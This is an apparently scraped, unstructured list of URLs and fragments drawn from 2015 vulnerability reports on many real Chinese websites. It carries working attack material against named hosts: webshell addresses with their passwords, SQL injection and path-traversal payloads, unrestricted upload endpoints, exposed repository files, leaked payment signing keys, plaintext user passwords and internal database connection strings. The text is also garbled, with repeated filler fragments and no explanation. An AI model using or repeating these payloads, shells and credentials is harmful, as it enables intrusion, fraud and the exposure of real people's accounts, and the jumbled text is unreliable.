shuijingcri:x:516:516::/alidata/home/shuijingcri:/bin/bash http://**.**.**.**/bugs/wooyun-2015-0116232 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://wap.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://wphone.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://symbian.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://android.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://user.andaijia.com/user/code?build=6.3&hash=xxxxxxxx&time=1438919595&user_mobile=18812341234&ver=a1.3 http://i1.zastatic.com/imwap/app/za.apk?ap http://user.qmango.com/ajax/ajax_qmsearch_new.asp?cityid=@@version&cityname=%u9752%u5C9B&keywords=%u7B2C%u4E00%u6D77%u6C34%u6D74%u573A http://**.**.**.**北京大学出版社 webshell:http://**.**.**.**/forum/data/2381382_.cfm?o=login密码adobe123 http://**.**.**.**/editor/popups/fileupload.cfm?sObj=sFileNamePath http://**.**.**.**/upload/2015/08/07/20150807095234969.cfm http://**.**.**.**/forum/data/2381382_.cfm?o=login http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.ncsjj.gov.cn/ http://cgs.ncsjj.gov.cn/ http://a221hc.changba.com/.svn/entries http://a219hc.changba.com/.svn/entries http://a220hc.changba.com/.svn/entries http://pushdx.dnion.com/ http://**.**.**/zk/contentmanager/currentCacheIpQuery.zul http://ws.montnets.com:9002/MWGate/wmgw.asmx/MongateCsSpSendSmsNew?userId=J00275&password=187523&pszMobis=15200009999&pszMsg=test&pszSubPort=1065712038002984 https://payments.changbashow.com/live/payment/aliJiJianZhiFu/notify_url.php http://**.**.**.**/ShowDetail.php?DEPCODE=1 http://**.**.**.**/bugs/wooyun-2015-0114051 http://**.**.**.**/index.php/Index/Cate http://**.**.**.** http://report.renrenche.com/ http://report.renrenche.com/?proc=2&resource=../../../../../../../etc/passwd http://mail.yili.com/ http://**.**.**.**/column2.jsp?funid=0&colid=18480 http://vote1.ynet.com/vote/Statistics.jsp?vsVoteId=21588 http://202.100.80.9/invoker/EJBInvokerServlet http://hq.fruitday.com:89/login.do http://www.people.com.cn/n/2012/404.js http://app.wumart.com/WMService/WMAppCommWebService.asmx?wsdl http://app.wumart.com/AppHD/WMAppCommWebService.asmx?wsdl http://fj.189.cn http://xshc.sxnu.edu.cn/phy_center_asp/shownews.asp?newsid=630 http://xshc.sxnu.edu.cn/phy_center_asp/admin/ http://**.**.**.**/findpwd.html http://**.**.**.**/hcareer/SocietyAdmin/LIB/Resume/WordEdit.aspx?id=1000 http://hc.nccu.edu.tw/public/view.php?main=3&sub=29&ssub=35&id=220 http://yes.solarbao.com/newslist.aspx?con= http://passport.ciwong.com/ConfirmValidEmail?485652743 http://passport.ciwong.com/ConfirmValidEmail?485652772 http://**.**.**.**/stb/apollo/kxgames/kx/res/images/garden/.svn/entries http://**.**.**.**/ibh/.svn/entries https://sso.sankuai.com/login http://dealer.xcar.com.cn/.ssh/known_hosts http://home.focus.cn/msgview/2456/21781694.html?author_id=1527644 https://jiaofei.alipay.com/market/chargeRemindInfoEntering.htm https://zht.alipay.com/asset/newIndex.htm http://**.**.**.**/cjcx/index.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/ http://**.**.**.**/cjcx/index.asp http://**.**.**.**/cjcx/ http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8082/cjcx/index1.asp http://kzone.kuwo.cn/mlog/#@ www.123456 www.123456 http://app.hc360.com/?adfr=syerwm http://58.214.240.114:8888 http://www.flyertea.com/comment/Index/ajaxList/?star_rate=&chain_id=&property_type=&sort=popularity&hotel= http://www.cninsure.net/Enterprise/StoryInfo.aspx?id=9732存在注入 http://www.cninsure.net/Enterprise/StoryInfo.aspx?id=9732%20and%20@@version=1 http://www.cninsure.net/Enterprise/StoryInfo.aspx?id=9732%20and%20user=1 http://ab-insurance.hiall.com.cn/cmd.php http://hxsy.ebh.net/forget/pwd.html?code=d61eeWoxWFhYWFhY&activecode=jO07VySfU9&ut=d61eMTg1MTE1NjEx%3D%3D http://wooyun.org/bugs/wooyun-2015-0123072 http://www.zhiup.cn http://oa.99114.com/ http://oa.99114.com/nullxiao.jsp http://218.29.101.7/defaultroot/upload/information/2015080413082532185869051.jsp密码tom http://www.jinher.com http://demos.jh0101.com/ http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20'0:0:3 http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20 http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20'0:0:5'-- http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay/**/'0:0:5'-- http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://bjoa.avic-intl.cn/ http://121.32.89.133:8001/打开就能看见 http://121.32.89.133:8001/console http://121.32.89.133:8001/wls_Server/a.jsp www.yohobuy.com http://open.lianlianpay.com/ http://www.feiyudai.com/*.txt http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"","user_info_dt_register":"20150130135405","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&valid_order=30&key=dgerg44r***56786523 http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"","user_info_dt_register":"20150130135410","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&valid_order=30&key=dgerg44rehrthrth56786523 http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"13476089996","user_info_dt_register":"20141017104055","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&user_id=2511&valid_order=30&key=dgerg44rehrthrth56786523 http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"","user_info_dt_register":"20150130135423","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&valid_order=30&key=dgerg44rehrthrth56786523 KEY:dgerg44rehrthrth56786523 http://www.feiyudai.com http://cppmde.com/ http://g.hiphotos.baidu.com/image/pic/item/7c1ed21b0ef41bd5f3bcaf4854da81cb38db3d9a.jpg http://www.libsys.com.cn/download/opac50_20131223.zip http://www.g-film.com/paipian/cinema.asp?tpid=1 www.g-film.com http://**.**.**.**/bugs/wooyun-2015-0114051 http://**.**.**.**/news/details/id/32 http://**.**.**.**/news/details?id=32 http://**.**.**.** http://liuxue.bfsu.edu.cn http://www.schtrust.com/index.php?m=content&c=index&a=show&catid=31&id=5211 http://fishdb.sinica.edu.tw/eng/document_link.php?id=380923&sc=Ostichthys http://bill.szgwbn.net.cn/ http://192.168.8.1/wan_NAT.asp?userLogin.asp http://192.168.8.1/maintain_logs.asp?userLogin.asp http://192.168.8.1/device_remote_manage.asp?userLogin.asp http://192.168.8.1/device_user_manage.asp?userLogin.asp http://192.168.8.1/device_user_manage.asp?userLogin.asp http://192.168.8.1/device_userpass_manage.asp?userLogin.asp http://192.168.8.1/acl_mac_filter.asp?refresh=yes?userLogin.asp http://192.168.8.1/acl_appLayer.asp?refresh=yes?userLogin.asp http://192.168.8.1/route_static.asp?refresh=yes?userLogin.asp http://192.168.8.1/wan_new.asp?refresh=yes?userLogin.asp http://192.168.8.1/lan_local_seter.asp?refresh=yes?userLogin.asp http://www.fsxgz.com/info.asp?t=1&s=11&i=326 http://www.fstfpm.com/ins.asp?t=0&s=1&i=1 www.fsjwwl.com(也存在注入) http://219.141.188.23/SumTotal/login.htm inurl:http://wk.yl1001.com/login_password http://wk.yl1001.com/doc_6701369821222755_all.htm?common_login_switch=person&common_login_username=382942055@qq.com&common_login_password=cx13600929167&safe_code= http://wk.yl1001.com/doc_3691346653911996_all.htm?common_login_switch=person&common_login_username=b2b_2008@126.com&common_login_password=asdfyl1001&safe_code= http://wk.yl1001.com/doc_3691377249960377_all.htm?common_login_switch=person&common_login_username=18959101532@163.com&common_login_password=xp198011&safe_code= http://wk.yl1001.com/doc_6881409470532713_all.htm?common_login_switch=person&common_login_username=312104495&common_login_password=1969305zlx1972&safe_code=&rmbUser=on http://**.**.**.**/inter/guanzhu_userdetail_action.asp?Page=2&act=post&username=QQ897032171 http://www.ca-maimai.com/ http://180.96.21.26:99/Home/index.php?m=Index&a=index http://fy.cnxz.com.cn/fy.rar site:m.minshenglife.com/ http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuM_2nsC5UzmKxI5iF8eJpGI http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuHyhwZOxLWrQCsUgG0sJKuc display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuEcCgDlDvshXXoS20BR3ric display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none http://gift.airchina.com.cn/AddrInfo.html?&AddressId=630800 http://gift.airchina.com.cn/AddrList.html?&AddressId=630800 http://gift.airchina.com.cn/AddrInfo.html?&AddressId=627367 http://bt.juntu.com/unionPayLog.txt http://bt.juntu.com/.svn/entries http://www.xindaip2p.com/Item/list.asp?id=1485 http://666.xindaip2p.com/xindai/admin http://sh.ziroom.com/ziroomer/activity/?category_id=11 http://www.dfmg.com.cn/EN/NewsDetail.aspx?ID=3238 http://ssp.cninsure.net/ssp/product/center/centerIndexAction.action?channelId=1 http://**.**.**.**/bugs/wooyun-2015-0116480而发 http://**.**.**.**/SubDepartmentInfo.aspx?subid=449 http://**.**.**.**/SubDepartmentInfo.aspx?subid=544 http://**.**.**.**/SubDepartmentInfo.aspx?subid=525 http://**.**.**.**/SubDepartmentInfo.aspx?subid=511 http://**.**.**.**/SubDepartmentInfo.aspx?subid=1 http://**.**.**.**/SubDepartmentInfo.aspx?subid=532 http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://ssp.cninsure.net/ssp/product/center/centerIndexAction.action?channelId=1 http://219.141.188.37 http://**.**.**.**/bugs/wooyun-2010-0103834 http://**.**.**.**/main.asp http://**.**.**.**/bbs/default.asp www.zip http://**.**.**.**/defaultroot/upload/information/2015080323244476070434708.jsp密码tom http://**.**.**.**/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://**.**.**/ http://gb.cri.cn/44571/2015/06/10/7872s4992373.htm http://121.40.166.230:10021/ http://www.bbktel.com.cn/Down_AD.php?id=11 http://**.**.**.**/stgl/view.php?id=20 https://github.com/75426585/gsweb/blob/6f4b33498c17e9356bc7593fbadd67e5e0c643d0/hweixin/config/xstest/const.php https://github.com/coolsky600/SSH-Code-Builder/blob/e670199245a17510387ad2951b78b2b8143e74f1/MDD/src/main/resources/appkey.properties http://www.ztesoft.com:808/zsmart/index.php http://www.ztesoft.com:808/upfile/20141226175700_643.php http://oa.gsfp.net/system/ http://www.minanins.com/maechannel/member/userlogin.do?m=y# http://gwact.woniu.com/gather/index/gatherSumNumber?act_id=3 http://gwact.woniu.com/gather/index/gatherSumNumber?act_id=3 http://58.60.230.84/UILoader/Login.aspx http://58.60.230.70/ http://59.36.102.206/defaultroot/upload/information/2015080403015521979999134.jsp http://59.36.102.206/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://www.drama.wang/zhuama/web/!!然后通过目录可读在发现一个页面http://www.drama.wang/zhuama/web/public/Jcrop/Modify_face.html!上传页面? http://hr.conch.cn/login.jsp http://hr.conch.cn/portalLogin.jsp http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/detail.asp?id=1021 http://newoa.conch.cn/conchoa/login.jsp http://fanhua.cninsure.net/help.aspx http://demo.yershop.com/index.php?s=/Home/account/savepaykey.html post:uid=1 http://demo.yershop.com/index.php?s=/home/article/comment post:goodid=1 http://demo.yershop.com/index.php?s=/home/article/commentgood post:goodid=1 http://demo.yershop.com/index.php?s=/home/article/commentmiddle post:goodid=1 http://demo.yershop.com/index.php?s=/home/article/commentworse post:goodid=1 http://demo.yershop.com/index.php?s=/Home/center/shezhi post:id=1 http://demo.yershop.com/index.php?s=/Home/center/deleteAddress.html post:id=1 http://demo.yershop.com/index.php?s=/home/order/detail/id/1 http://demo.yershop.com/index.php?s=/home/order/cancel/id/1 http://demo.yershop.com/index.php?s=/home/order/canceldetail/id/1 http://demo.yershop.com/index.php?s=/home/order/backdetail/id/1 http://demo.yershop.com/index.php?s=/home/order/changedetail/id/1 http://demo.yershop.com/index.php?s=/home/order/wuliu/orderid/1 http://demo.yershop.com/index.php?s=/home/order/back/ post:id=1 http://demo.yershop.com/index.php?s=/home/order/backkuaidi/ post:backid=1 http://demo.yershop.com/index.php?s=/home/order/change/ post:id=1 http://demo.yershop.com/index.php?s=/home/order/changekuaidi/ post:backid=1 http://demo.yershop.com/index.php?s=/home/order/complete/id/1 http://demo.yershop.com/index.php?s=/home/pay/index/orderid/1 http://demo.yershop.com/index.php?s=/home/pay/chongzhi/orderid/1 http://demo.yershop.com/index.php?s=/home/service/index/id/1 http://demo.yershop.com/index.php?s=/home/shopcart/addItem/ post:id=1'&i=1 http://demo.yershop.com/index.php?s=/home/shopcart/addgood/ post:id=1 http://demo.yershop.com/index.php?s=/home/shopcart/createorder/ post:tag=1 http://demo.yershop.com/index.php?s=/home/shopcart/delItemByuid/ post:sort=1 http://demo.yershop.com/index.php?s=/home/shopcart/getPricetotal/tag/1 http://demo.yershop.com/index.php?s=/home/shopcart/getpriceNum/id/1 http://demo.yershop.com/index.php?s=/home/user/checkcode/ post:couponid=1 http://demo.yershop.com/index.php?s=/home/user/getcoupon/ post:couponid=1 http://demo.yershop.com/index.php?s=/home/user/cut/id/1 http://demo.yershop.com/index.php?s=/home/article/comment http://bi.e-nci.com/manager/html http://bi.e-nci.com/portal/pages/login.jsp http://bi.e-nci.com/JspSpyJDK5/JspSpyJDK5.jsp?o=vLogin index.php/cms/carshop/ajax_dealerList/ http://a.xcar.com.cn:80/ http://www.qqtech.com/about/index.htm,如图所示: http://**.**.**.**/FCKeditor/editor/filemanager/connectors/test.html http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=../../connectors/aspx/connector.aspx https://github.com/superman66/wechatSDK-java/blob/c1993c1e0daa70c8169752abcd68cc5b110ed9be/src/core/app/wechat.properties http://zhidao.h3c.com/ http://**.**.**.**/eportal/fileDir/hezegsj/resource/cms/2015/08/2015080823123710201.jspx http://www.westone.com.cn/employ/positionid=34.html http://www.westone.com.cn/upload/简历/day_150808/201508080438589181.aspx http://m.mbaobao.com/user/address/list.html#address/edit/6592638 http://m.mbaobao.com http://m.mbaobao.com/user/address/list.html http://61.160.137.184/telcom10000/BBUserServlet?do=userAuthByIpAndPort X-Forwarded-For:49.69.204.2 android:allowBackup参数值为"true", http://dj.49you.com/web/CPGameManage.jsp http://dj.49you.com/web/cpincome.jsp http://dj.49you.com/web/cpProvinceList.jsp http://dj.49you.com/web/sy_sjwar_cpincome.jsp http://dj.49you.com/web/tab/LyGameIncome.jsp http://dj.49you.com/web/tab/WoGameIncome.jsp http://61.191.18.249/defaultroot/upload/information/2015080414251981972335215.jsp http://61.191.18.249/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://**.**.**.**/cityaccount/login.do www.chinalife.com.tw/servlet/webepaper002?step=1&pinWbephmbr=2008-05 http://moneydai.com https://github.com/biyefeilan/xyplatform https://github.com/biyefeilan/xyplatform/blob/a2b5fd1356b076f1a80e162d1f1a9a30f360901b/ulync-platform-webapp/src/main/resources/templates/register/form.html https://github.com/biyefeilan/xyplatform/blob/master/ulync-platform-webapp/src/main/resources/application-dev.properties jdbc:mysql://218.30.15.220:3306/xiyu_uums?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://111.205.15.132/iufotempfile/3anr7nnhccigdt07t5a386z64h5t31/system_013138.jsp http://www.cnyc.gov.cn/wsbs_more2.asp?classid=279 http://www.cnyc.gov.cn/admin.asp http://new.edong.com:80/ http://new.edong.com:80/ www.zjcgs.gov.cn/news_list.aspxid=26&page=1_ http://lib.cslg.cn:40000/lres/study/lecture.html?lec_type_id=5 http://siais.shanghaitech.edu.cn/newsview.asp?id=168 http://sqlmap.org http://www.daidaiwangfa.com/tinvest/reward?id=12 http://**.**.**.**:8087/ http://**.**.**.**:8087/ http://**.**.**.**/admin/ http://**.**.**.**/5.jsp Pass:allen http://**.**.**.**/welcome.do http://lexue.tcl.com/Admin/ http://passport.lexue.tcl.com/Passport/Login.aspx?ru=http%3a%2f%2flexue.tcl.com%2fAdmin%2fDefault.aspx&to=-2&aid=Admin&ip=123.233.7.82&lou=http%3a%2f%2flexue.tcl.com%2fAdmin%2fAdmin%2fMCSAuthenticateLogOff.axd&sf=e4d38dd8ef6298fe http://lexue.tcl.com/Admin/ http://**.**.**.**/admin/admin.jsp http://dj.49you.com/web/tab/manage.jsp?action=updatesave&id=11&type=2 http://dj.49you.com/web/tab/QdGameIncome.jsp http://dj.49you.com/web/tab/SKGameIncome.jsp http://dj.49you.com/web/ltsjyx_income.jsp http://221.12.171.172:9101/ https://github.com/hs-fcloud/over-the-wall jdbc:mysql://rdsnqrqranqrqra.mysql.rds.aliyuncs.com:3306/hsgzl?useUnicode=true&amp;amp;characterEncoding=utf8&amp;amp;useServerPrepStmts=false&amp;amp;rewriteBatchedStatements=true http://edm.huitongke.com/Sd/ http://edm.huitongke.com/ http://h.kuwo.cn/hsy/hz/wdj/zhibotest.jsp?id=26 http://**.**.**.**/showsinglepage.php?catid=23 http://**.**.**.**/images/ http://apidemo.west263.com/try/ http://www.kangq.com http://www.kangq.com/index.php?app=public&mod=Account&act=address&id=30000&s=1 http://icme.haoyisheng.com/login/login.jsp http://www.kangq.com http://www.kangq.com/space/2014475 http://s.96335.com/wforder/order/unLogMyOrderDetail.action?model.flowId=W15080800001 http://**.**.**.** http://jiwei.nwnu.edu.cn/Article/index.php?id=67 http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx http://m.mbaobao.com http://m.mbaobao.com/login.html?sendURL=/user/ http://183.62.40.31/defaultroot/login.jsp http://183.62.40.31/jmx-console/ http://183.62.40.31/is/index.jsp https://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ysxkzcx.asp http://zzjz2.edong.com/webmall/query.php?catid=0&imageField=&key=1&myord=1&typeid=0 http://api.koudailc.com/project/project-detail?id=2055 http://**.**.**.**/DKasp/Login.asp http://www.ayibang.com/appointment/detail?keyword=project_depth_cleaning&city=%E5%8C%97%E4%BA%AC http://**.**.**.**/ http://www.kibey.com/square/ http://www.kibey.com/space/freenote/view/id/18229 http://zzjz2.edong.com/webmall/index.php?author=&catid=0&fromprice=&key=&myord=1&myshownums=&page=1&toprice=&typeid=0 http://new.edong.com:80/ http://61.144.226.2:7009/gzflhnw/LoginAction.do http://www.doyouhike.net/dujia/product/search/?keyword=1 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.feeyo.com/vote/view.asp?id=3c0aa6d9f9397746 http://cwc.njupt.edu.cn/phpmyadmin/ http://pinggu.hnfnu.edu.cn/Back/manage.asp http://news.xauat.edu.cn/guest.php目测没任何过滤,坐等cookie http://news.xauat.edu.cn/list.php?classid=55 http://news.xauat.edu.cn/read.php?classid=40&newsid=9291 www.angelvestgroup.com/info.php?id=1存在SQL注入 http://job.xcu.edu.cn/ http://cds.zt-express.com/PageViews/Site/List.aspx http://gzlss.hrssgz.gov.cn/gzlss_web/business/authentication/login.xhtml http://gzlss.hrssgz.gov.cn/gzlss_web/business/front/foundationcentre/getHealthcarePersonPayHistorySumup.xhtml?query=1&querylog=true&businessocde=291QB_YBGRJFLSCX&visitterminal=PC&aac001=1007919859&startStr=201505&endStr=201509 http://gzlss.hrssgz.gov.cn/gzlss_web/business/front/foundationcentre/anonview/viewPersonPayHistoryInfo.xhtml?aac001=1007919863&xzType=1&startStr=201505&endStr=201507&querylog=true&businessocde=291QB-GRJFLS&visitterminal=PC http://**.**.**/monitoring http://**.**.**.**/School/Style1/AboutUs?id=100942 www.minanins.com/maechannel/manage/bcJinPengProposalRelation/list.do?tc=29 www.minanins.com/maechannel/manage/bcJinPengProposalRelation/list.do?tc=29 http://**.**.**.**/p-960086653.html http://seecom.zte.com.cn/SmartTV/pcuser_initSubmit.action http://www.th360.cn/config.php~ http://www.th360.cn/index.php~ http://www.th360.cn/log.txt http://cip.dongfeng-nissan.com.cn http://admin.chineseoffice.com.cn/Default.aspx http://www.dfmg.com.cn/EN/Index.aspx http://**.**.**.**/images/menu/.svn/entries http://oa.minanins.com http://oa.minanins.com/maechannel/manage/bcJinPengProposalRelation/list.do?tc=29 http://open.lianlianpay.com/ http://www.fengtouwang.com/log.txt http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5×tamp=20150513113540&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=8&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406 http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5×tamp=20150513113611&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=43&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406 http://www.fengtouwang.com/api/llpaycz/notify_url.php&oid_partner=201505111000320502&sign_type=MD5×tamp=20150513131605&url_return=http://www.fengtouwang.com/api/llpaycz/return_url.php&user_id=35&userreq_ip=10_10_246_110&valid_order=10080&version=1.0&key=201505111000320502_ftouw_513113406 KEY:201505111000320502_ftouw_513113406 http://www.fengtouwang.com http://open.lianlianpay.com/ http://www.nanhaict.com/log.txt http://www.nanhaict.com/modules/payment/classes/llpay/llpay_notify_url.php&oid_partner=201502051000206505&sign_type=MD5×tamp=20150226100317&url_return=http://www.nanhaict.com/modules/payment/classes/llpay/llpay_return_url.php&user_id=670&version=1.0&key=201502051000206505nhct_20150225 http://www.nanhaict.com/modules/payment/classes/llpay/llpay_notify_url.php&oid_partner=201502051000206505&sign_type=MD5×tamp=20150226101647&url_return=http://www.nanhaict.com/modules/payment/classes/llpay/llpay_return_url.php&user_id=670&version=1.0&key=201502051000206505nhct_20150225 http://www.nanhaict.com/modules/payment/classes/llpay/llpay_notify_url.php&oid_partner=201502051000206505&sign_type=MD5×tamp=20150226145604&url_return=http://www.nanhaict.com/modules/payment/classes/llpay/llpay_return_url.php&user_id=670&version=1.0&key=201502051000206505nhct_20150225 KEY:201502051000206505nhct_20150225 http://www.nanhaict.com http://**.**.**.**/cbastats/cbalivedetail.aspx?matchno=C201440612553230&id=406&rid=1 http://www.361sport.com/index.php?m=Member&a=getpwd http://open.lianlianpay.com/ http://www.xyd.net.cn/log.txt http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/notify_url.php&oid_partner=201504271000301507&sign_type=MD5×tamp=20150513094538&url_return=http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/return_url.php&user_id=3559&valid_order=10080&version=1.0&key=allen http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/notify_url.php&oid_partner=201504271000301507&sign_type=MD5×tamp=20150513095410&url_return=http://ceshi.xyd.net.cn/modules/account/payclasses/lianlian/return_url.php&user_id=3559&valid_order=10080&version=1.0&key=allen http://www.xyd.net.cn/modules/account/payclasses/lianlian/notify_url.php&oid_partner=201504271000301507&sign_type=MD5×tamp=20150513095923&url_return=http://www.xyd.net.cn/modules/account/payclasses/lianlian/return_url.php&user_id=3559&valid_order=10080&version=1.0&key=allen KEY:allen http://www.xyd.net.cn http://**.**.**.**/bugs/wooyun-2015-0117270而发 http://**.**.**.**/web/WorkSort.aspx?ActiviId=4&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=27&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=17&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=3&typeId=1 http://**.**.**.**/web/WorkSort.aspx?ActiviId=4&typeId=1 http://**.**.**.**/webtraining/web/WorkSort.aspx?ActiviId=3&typeId=1 http://**.**.**.**/web/activiList.aspx?ActiviId=6 http://**.**.**.**/web/activiList.aspx?ActiviId=6 http://**.**.**.**/web/activiList.aspx?ActiviId=4 http://**.**.**.**/web/activiList.aspx?ActiviId=7齐齐哈尔市民学习网 http://**.**.**.**/web/activiList.aspx?ActiviId=9马鞍山市中小微企业网络学院 http://**.**.**.**/webtraining/web/activiList.aspx?ActiviId=6 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35齐齐哈尔市民学习网 http://**.**.**.**/web/ActiviDetail.aspx?ActiviId=6&WorkId=35马鞍山市中小微企业网络学院 http://**.**.**.**/webtraining/web/ActiviDetail.aspx?ActiviId=6&WorkId=35 http://**.**.**.**/list.php?id=131 http://gonghui.pudong-edu.sh.cn/3.aspx密码123 www.123.com jdbc:sqlserver://172.16.100.49:1433;DatabaseName=ccbusiness jdbc:sqlserver://172.16.100.49:1433;DatabaseName=MHJKW jdbc:db2://172.16.100.33:50000/MHJKW jdbc:sqlserver://10.98.24.4:1433;DatabaseName=bslis jdbc:sqlserver://10.98.96.8:1433;DatabaseName=bslis jdbc:sqlserver://10.98.0.6:1433;DatabaseName=bslis jdbc:sqlserver://10.97.160.7:1433;DatabaseName=bslis jdbc:sqlserver://10.98.16.6:1433;DatabaseName=bslis jdbc:sqlserver://10.98.192.8:1433;DatabaseName=bslis jdbc:sqlserver://10.97.34.5:1433;DatabaseName=bslis jdbc:sqlserver://10.98.168.6:1433;DatabaseName=bslis jdbc:sqlserver://10.98.164.5:1433;DatabaseName=bslis jdbc:sqlserver://10.98.64.3:1433;DatabaseName=bslis jdbc:sqlserver://10.97.128.6:1433;DatabaseName=bslis jdbc:sqlserver://10.98.236.118:1433;DatabaseName=bslis jdbc:sqlserver://10.98.110.2:1433;DatabaseName=bslis jdbc:sqlserver://10.96.36.40:1433;DatabaseName=mhsqxt jdbc:sqlserver://10.96.36.37:11433;DatabaseName=mhjkw jdbc:sqlserver://10.98.24.4:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.96.8:1433;DatabaseName=bsrun 